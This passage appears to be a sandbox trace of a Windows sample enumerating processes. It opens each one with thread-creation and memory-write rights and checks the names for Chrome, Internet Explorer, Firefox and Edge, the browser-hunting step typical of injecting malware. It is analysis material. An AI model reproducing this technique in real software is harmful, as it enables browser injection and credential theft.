	[0232.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6e40
	[0232.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.710] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.710] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6e44
	[0232.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.711] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.712] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.712] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6e48
	[0232.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.713] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.714] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.714] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.714] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6e4c
	[0232.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6e50
	[0232.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.718] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.719] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6e54
	[0232.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.720] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6e58
	[0232.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.745] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.745] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.746] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.746] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6e5c
	[0232.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.747] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0232.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.747] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.748] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0232.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.748] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6e60
	[0232.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.749] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.749] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.750] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.750] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6e64
	[0232.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.751] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.752] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.752] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.753] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6e68
	[0232.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.754] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.754] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.754] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.755] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6e6c
	[0232.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.756] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.756] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.757] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.757] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6e70
	[0232.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.758] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.759] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.759] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.759] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0232.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6e74
	[0232.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.761] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0232.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.761] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.761] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0232.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.762] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0232.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6e78
	[0232.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.763] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.763] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.763] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.764] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0232.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6e7c
	[0232.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.765] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0232.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.765] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.765] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0232.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.766] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0232.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0232.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0232.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6e80
	[0232.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.768] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0232.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.769] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.770] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0232.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.771] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0232.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6e84
	[0232.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.773] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0232.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.773] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.773] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0232.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.774] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0232.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6e88
	[0232.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.775] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0232.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.775] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.775] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0232.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.776] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0232.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6e8c
	[0232.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.777] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0232.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.777] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.778] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0232.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.778] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0232.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6e90
	[0232.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.779] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0232.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.780] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.780] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0232.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.781] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0232.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6e94
	[0232.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.782] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0232.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.782] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.783] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0232.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.783] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0232.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6e98
	[0232.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.791] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0232.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.792] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.792] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0232.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.793] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0232.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6e9c
	[0232.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.794] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0232.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.795] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.795] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0232.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.796] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
